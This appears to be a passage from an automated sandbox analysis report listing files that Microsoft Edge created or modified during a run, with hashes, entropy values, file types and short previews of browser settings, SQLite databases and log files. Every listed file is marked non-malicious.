                                                                                                                                                            Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 39, 1st free page 10, free pages 4, cookie 0x45, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):159744
                                                                                                                                                            Entropy (8bit):0.5241404324800358
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:56U+bGzPDLjGQLBE3up+U0jBo4tgi3JMe9xJDECVjN:5R+GPXBBE3upb0HtTTDxVj
                                                                                                                                                            MD5:241322143A01979D346689D9448AC8C0
                                                                                                                                                            SHA1:DD95F97EE1CCB8FD9026D2156DE9CB8137B816D1
                                                                                                                                                            SHA-256:65EEBDEC4F48A111AC596212A1D71C3A5CFA996797500E5344EEABDFA02527C8
                                                                                                                                                            SHA-512:9C7241462A9DADEF25D8EEB1C14BABFBA65C451EBAFBC068B9856E4EF0EB6F894A44686CBB0D1F46C7F546335D0C53A3E386E6C1A017082DE127F8F9C0A54BD2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:modified
                                                                                                                                                            Size (bytes):8720
                                                                                                                                                            Entropy (8bit):0.32778212170214727
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:Cl/0A/J3+t76Y4QZZofU99pO0BYlcqR4EZY4QZvGA:WFhHQws9LdGbBQZGA
                                                                                                                                                            MD5:26305DEAB269D29CF8FF3DBF3A6CBF33
                                                                                                                                                            SHA1:B87DD9CF6C28632348A93337F24B5DC59CA9BCB6
                                                                                                                                                            SHA-256:C4E159C5E75EF09F808B6C5D82F4CF9C00D1C61B8C9113B455ABCBDC86FD9FEA
                                                                                                                                                            SHA-512:099D7D566F44B43A441BDC27B13D4B71E3E1E8DE57E3F5907B3021B10DEB69B687806FEE0BFD6831C6E366CA3865D8C528C1A7904DC7523883E687D1AE370933
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):115717
                                                                                                                                                            Entropy (8bit):5.183660917461099
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                            MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                            SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                            SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                            SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 11, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):45056
                                                                                                                                                            Entropy (8bit):3.548601076678917
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:zj9P0WyQkQeracp773pLIgam6IDP/KbtERKToaAQhf:zdxye2Np7hzP/hRKc09
                                                                                                                                                            MD5:4DD6BDDFCA7D63320B2382CA12AE0307
                                                                                                                                                            SHA1:EDE0F13873157AFA93E9C1146DBDF4DB65FFA2DE
                                                                                                                                                            SHA-256:13E40EE2BA408905C3E066ED41F7B8E1CDD6A955C29B04F7AF5454FEE0A34316
                                                                                                                                                            SHA-512:025ACD5628C0934C6512A9FC94F942C4DFA04FE44EB7D137636671C50C664CC9036BBC5C736307D492620CBF284B40FC7A955A4367BA490412AB03BDC985FB65
                                                                                                                                                            Malicious:false
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):406
                                                                                                                                                            Entropy (8bit):5.240504706170167
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:7/pTe8+vYfYeb8rcHEZrELFUtNpTAZ/zpTANV5JfYeb8rcHEZrEZSJ:7/0tYfYeb8nZrExgN4YJfYeb8nZrEZe
                                                                                                                                                            MD5:BD12C49599F2AD18C540D9184435716C
                                                                                                                                                            SHA1:9D530720278D43234C6C8E063331EBD694D2AD6B
                                                                                                                                                            SHA-256:6E701E6AC98F5F677D0F5A5715309DD84B3E2C03C1A4445C82100BE788CAE256
                                                                                                                                                            SHA-512:A8CE2CD68FD5030D9F940A95B6FD71C5EF365ABD4F2CE5FC65947386FA14B7BD2332922172D36F9B0794B97DD3BA443E262830CAFB7F5660F2A1D51B58C17C87
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:2025/01/06-17:05:00.244 14bc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/01/06-17:05:00.245 14bc Recovering log #3.2025/01/06-17:05:00.245 14bc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):406
                                                                                                                                                            Entropy (8bit):5.240504706170167
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:7/pTe8+vYfYeb8rcHEZrELFUtNpTAZ/zpTANV5JfYeb8rcHEZrEZSJ:7/0tYfYeb8nZrExgN4YJfYeb8nZrEZe
                                                                                                                                                            MD5:BD12C49599F2AD18C540D9184435716C
                                                                                                                                                            SHA1:9D530720278D43234C6C8E063331EBD694D2AD6B
                                                                                                                                                            SHA-256:6E701E6AC98F5F677D0F5A5715309DD84B3E2C03C1A4445C82100BE788CAE256
                                                                                                                                                            SHA-512:A8CE2CD68FD5030D9F940A95B6FD71C5EF365ABD4F2CE5FC65947386FA14B7BD2332922172D36F9B0794B97DD3BA443E262830CAFB7F5660F2A1D51B58C17C87
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:2025/01/06-17:05:00.244 14bc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2025/01/06-17:05:00.245 14bc Recovering log #3.2025/01/06-17:05:00.245 14bc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1601
                                                                                                                                                            Entropy (8bit):5.584287677561133
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:uZ7jW8qFXZ/JV03Sx497AHHk2GJ348ylsEWyG:upjSRhJZdP8osz
                                                                                                                                                            MD5:8901A5744F9D776AFE88EBC8CFA15DCC
                                                                                                                                                            SHA1:77F0931566390EAAB35DD7A33551BCF108D6495E
                                                                                                                                                            SHA-256:8C1C7B342677A2BBC7FF7C753829AA85411C1EEB2003923AA23FB3580CE7E2E2
                                                                                                                                                            SHA-512:A1BD0D85A03B9C7CB5B3C17614EA0AE7CB2874660C380CE4981E52536646591B36CEF6085389506D88F0366AA028711C6EAA5EDF88CE003CF60298F45FB16770
                                                                                                                                                            Malicious:false
Preview: d...:................VERSION.1..META:https://ntp.msn.com.............._https://ntp.msn.com..FallbackNavigationResult@.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":1022}.!_https://ntp.msn.com..LastKnownPV..1736201107507.-_https://ntp.msn.com..LastVisuallyReadyMarker..1736201108845.._https://ntp.msn.com..MUID!.04956DB2EAC862DE2FFB78DEEBAA63F6.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1736201107634,"schedule":[-1,24,-1,22,-1,0,-1],"scheduleFixed":[-1,24,-1,22,-1,0,-1],"simpleSchedule":[24,41,45,46,31,50,22]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1736201107457.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20250106.365"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_http

Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: ASCII text
Category: dropped
Size (bytes): 334
Entropy (8bit): 5.165125317730231
Encrypted: false
SSDEEP: 6:iO/p8q2Pwkn23oH+Tcwt8a2jMGIFUtN5uXZmwznZkwOwkn23oH+Tcwt8a2jMmLJ:7/p8vYfYeb8EFUtN4/znZ5JfYeb8bJ
MD5: 890E63171AD51DB29C2D7BA879AA9540
SHA1: F5FFDEA1C1129EEECC06C3CFE505DD0DDCC08B0B
SHA-256: BCB4FFDE7610E95392CC8686296776125BD61A9505CF37C34D5F4EF028F06E55
SHA-512: 3FDD9D45C06976EB996563BC4AD5F34A67FE06BF66089F75F7ECBF74ECD5C8181E908839DA384BF90759C8C98DFACF32A87426AF0F596FC344056541B77B0D65
Malicious: false
Preview: 2025/01/06-17:04:58.886 10e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/01/06-17:04:58.887 10e0 Recovering log #3.2025/01/06-17:04:58.891 10e0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: ASCII text
Category: dropped
Size (bytes): 334
Entropy (8bit): 5.165125317730231
Encrypted: false
SSDEEP: 6:iO/p8q2Pwkn23oH+Tcwt8a2jMGIFUtN5uXZmwznZkwOwkn23oH+Tcwt8a2jMmLJ:7/p8vYfYeb8EFUtN4/znZ5JfYeb8bJ
MD5: 890E63171AD51DB29C2D7BA879AA9540
SHA1: F5FFDEA1C1129EEECC06C3CFE505DD0DDCC08B0B
SHA-256: BCB4FFDE7610E95392CC8686296776125BD61A9505CF37C34D5F4EF028F06E55
SHA-512: 3FDD9D45C06976EB996563BC4AD5F34A67FE06BF66089F75F7ECBF74ECD5C8181E908839DA384BF90759C8C98DFACF32A87426AF0F596FC344056541B77B0D65
Malicious: false
Preview: 2025/01/06-17:04:58.886 10e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2025/01/06-17:04:58.887 10e0 Recovering log #3.2025/01/06-17:04:58.891 10e0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 28, cookie 0x1d, schema 4, UTF-8, version-valid-for 2
Category: dropped
Size (bytes): 57344
Entropy (8bit): 0.863060653641558
Encrypted: false
SSDEEP: 96:u7/KLPeymOT7ynlm+yKwt7izhGnvgbn8MouB6wznP:u74CnlmVizhGE7IwD
MD5: C681C90B3AAD7F7E4AF8664DE16971DF
SHA1: 9F72588CEA6569261291B19E06043A1EFC3653BC
SHA-256: ADB987BF641B2531991B8DE5B10244C3FE1ACFA7AD7A61A65D2E2D8E7AB34C1D
SHA-512: 4696BF334961E4C9757BAC40C41B4FBE3E0B9F821BD242CE6967B347053787BE54D1270D7166745126AFA42E8193AC2E695B0D8F11DE8F0B2876628B7C128942
Malicious: false
Preview: SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 11, cookie 0x6, schema 4, UTF-8, version-valid-for 3
Category: dropped
Size (bytes): 45056
Entropy (8bit): 0.40293591932113104
Encrypted: false
SSDEEP: 24:TLVgTjDk5Yk8k+/kCkzD3zzbLGfIzLihje90xq/WMFFfeFzfXVVlYWOT/CUFSe:Tmo9n+8dv/qALihje9kqL42WOT/9F
MD5: ADC0CFB8A1A20DE2C4AB738B413CBEA4
SHA1: 238EF489E5FDC6EBB36F09D415FB353350E7097B
SHA-256: 7C071E36A64FB1881258712C9880F155D9CBAC693BADCC391A1CB110C257CC37
SHA-512: 38C8B7293B8F7BEF03299BAFB981EEEE309945B1BDE26ACDAD6FDD63247C21CA04D493A1DDAFC3B9A1904EFED998E9C7C0C8E98506FD4AC0AB252DFF34566B66
Malicious: false
Preview: SQLite format 3......@ ..........................................................................j.......=......\.t.+.>...,...=........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: JSON data
Category: dropped
Size (bytes): 22
Entropy (8bit): 3.788754913993502
Encrypted: false
SSDEEP: 3:YWRAW4J2LSQ:YWyW5SQ
MD5: 3BB76EC23C5506830EAD56540E06159F
SHA1: 94695E47D907E559E91E677CEC4EB763DC0C5CA9
SHA-256: 6B40F4AE548688A472BE3CA0C1B08ECF520B31E706FEC0F9793B4666134EBA06
SHA-512: 307F9BD06CA5EE753ACDC450CF1599DFC8ED080D9A1B19D752DD9B7950377A5B04E44D374F12ED76ABD74961C2B1F8AD6C93E4663EA77F5D6E066570C1AA6BAD
Malicious: false
Preview: {"sts":[],"version":2}

Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: JSON data
Category: dropped
Size (bytes): 40
Entropy (8bit): 4.1275671571169275
Encrypted: false
SSDEEP: 3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5: 20D4B8FA017A12A108C87F540836E250
SHA1: 1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256: 6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512: 507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious: false
Preview: {"SDCH":{"dictionaries":{},"version":2}}

Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: JSON data
Category: dropped
Size (bytes): 111
Entropy (8bit): 4.718418993774295
Encrypted: false
SSDEEP: 3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiVY:YHpoeS7PMVKJTnMRK3VY
MD5: 285252A2F6327D41EAB203DC2F402C67
SHA1: ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
SHA-256: 5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
SHA-512: 11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
Malicious: false
Preview: {"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: JSON data
Category: dropped
Size (bytes): 2
Entropy (8bit): 1.0
Encrypted: false
SSDEEP: 3:H:H
MD5: D751713988987E9331980363E24189CE
SHA1: 97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256: 4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512: B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious: false
Preview: []

Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: JSON data
Category: dropped
Size (bytes): 2
Entropy (8bit): 1.0
Encrypted: false
SSDEEP: 3:H:H
MD5: D751713988987E9331980363E24189CE
SHA1: 97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256: 4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512: B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious: false
Preview: []

Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
Category: modified
Size (bytes): 20480
Entropy (8bit): 2.7750936882384765
Encrypted: false
SSDEEP: 192:tTs+LNfsuDqDs3tXlKQTQ39zXly4X8fUXcf0L/ZJVb:Vs+Ltxx394QTQ397s8XI0LhJVb
MD5: B31C5D28A677CA68484E35FEAA730E38
SHA1: F0236BF5E459A7DF9262A95062DD8D0AAFDD2E6E
SHA-256: CAFCCEF3E3064224A64AA88644E3E6BC015AF6F2AC0D5FB13F17682613EE578E
SHA-512: 79902E5E706CE84DACCF2854D490591C462A056DAC67998ED405E4C45B3779E7E9D1F868031E08764E29A249D78E960217B5013AB82420DBFC9F16D88338BF3E
Malicious: false
Preview: SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: JSON data
Category: dropped
Size (bytes): 61
Entropy (8bit): 3.926136109079379
Encrypted: false
SSDEEP: 3:YLb9N+eAXRfHDH2LSL:YHpoeSL
MD5: 4DF4574BFBB7E0B0BC56C2C9B12B6C47
SHA1: 81EFCBD3E3DA8221444A21F45305AF6FA4B71907
SHA-256: E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
SHA-512: 78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
Malicious: false
Preview: {"net":{"http_server_properties":{"servers":[],"version":5}}}

Process: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type: JSON data
Category: dropped
Size (bytes): 61
Entropy (8bit): 3.926136109079379
Encrypted: false
SSDEEP: 3:YLb9N+eAXRfHDH2LSL:YHpoeSL
MD5: 4DF4574BFBB7E0B0BC56C2C9B12B6C47
SHA1: 81EFCBD3E3DA8221444A21F45305AF6FA4B71907
SHA-256: E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
SHA-512: 78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
Malicious: false
Preview: {"net":{"http_server_properties":{"servers":[],"version":5}}}
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):36864
                                                                                                                                                            Entropy (8bit):1.1127885943733462
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:TFkIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB9j:JkIEumQv8m1ccnvS6rN
                                                                                                                                                            MD5:D3D51E6803182783BC432671FC01FC7B
                                                                                                                                                            SHA1:202B9B96CC5A3256E8B155C6688F77188CFC8A0F
                                                                                                                                                            SHA-256:FE1591447595CFE5E237FCA1A6885934B330478A0A65F8E7914D93A80A48F705
                                                                                                                                                            SHA-512:531950D53DEB242E673B99CB0087AA4E9CD2A9595E81C6C14E12BD073FF626606513A73D9D363C7CC2A59E8AA3705379F5ED9AAAE4B91AC6717AD82A1AB2FC83
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2
                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:[]
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2
                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:[]
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2
                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:[]
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):40
                                                                                                                                                            Entropy (8bit):4.1275671571169275
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                            MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                            SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                            SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                            SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):203
                                                                                                                                                            Entropy (8bit):5.4042796420747425
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:YAQN1iL50xHA9vh8wXwlmUUAnIMp5sXX2SQ:Y45Sg9vt+UAnIXZQ
                                                                                                                                                            MD5:24D66E5F1B8C76C76511DA68057CDE5E
                                                                                                                                                            SHA1:70225FEC1AE3FEF8D8A767D9EA0B0E108BF8F10D
                                                                                                                                                            SHA-256:D5CB3A4A104E2EC4F13E8B4CDF3BD469E0AB638713928BEA1EAEAF03998B794C
                                                                                                                                                            SHA-512:1CA093B4BB4E0B3EE0B791AD0E6B39AC9640CEB6ED005BD10A10B4AF904858F4898D86D26B60B625CDA9425FF317C6B9FE0DF2E12C897A52720AF775B19491AA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"expect_ct":[],"sts":[{"expiry":1727869700.805692,"host":"dUymlFcJcEIuWrPNRCRXYtREHxXDHdPfT47kO1IQnQ0=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1696333700.805702}],"version":2}
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):203
                                                                                                                                                            Entropy (8bit):5.4042796420747425
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:YAQN1iL50xHA9vh8wXwlmUUAnIMp5sXX2SQ:Y45Sg9vt+UAnIXZQ
                                                                                                                                                            MD5:24D66E5F1B8C76C76511DA68057CDE5E
                                                                                                                                                            SHA1:70225FEC1AE3FEF8D8A767D9EA0B0E108BF8F10D
                                                                                                                                                            SHA-256:D5CB3A4A104E2EC4F13E8B4CDF3BD469E0AB638713928BEA1EAEAF03998B794C
                                                                                                                                                            SHA-512:1CA093B4BB4E0B3EE0B791AD0E6B39AC9640CEB6ED005BD10A10B4AF904858F4898D86D26B60B625CDA9425FF317C6B9FE0DF2E12C897A52720AF775B19491AA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"expect_ct":[],"sts":[{"expiry":1727869700.805692,"host":"dUymlFcJcEIuWrPNRCRXYtREHxXDHdPfT47kO1IQnQ0=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1696333700.805702}],"version":2}
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):36864
                                                                                                                                                            Entropy (8bit):0.36515621748816035
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:TLH3lIIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:Tb31DtX5nDOvyKDhU1cSB
                                                                                                                                                            MD5:25363ADC3C9D98BAD1A33D0792405CBF
                                                                                                                                                            SHA1:D06E343087D86EF1A06F7479D81B26C90A60B5C3
                                                                                                                                                            SHA-256:6E019B8B9E389216D5BDF1F2FE63F41EF98E71DA101F2A6BE04F41CC5954532D
                                                                                                                                                            SHA-512:CF7EEE35D0E00945AF221BEC531E8BF06C08880DA00BD103FA561BC069D7C6F955CBA3C1C152A4884601E5A670B7487D39B4AE9A4D554ED8C14F129A74E555F7
                                                                                                                                                            Malicious:false
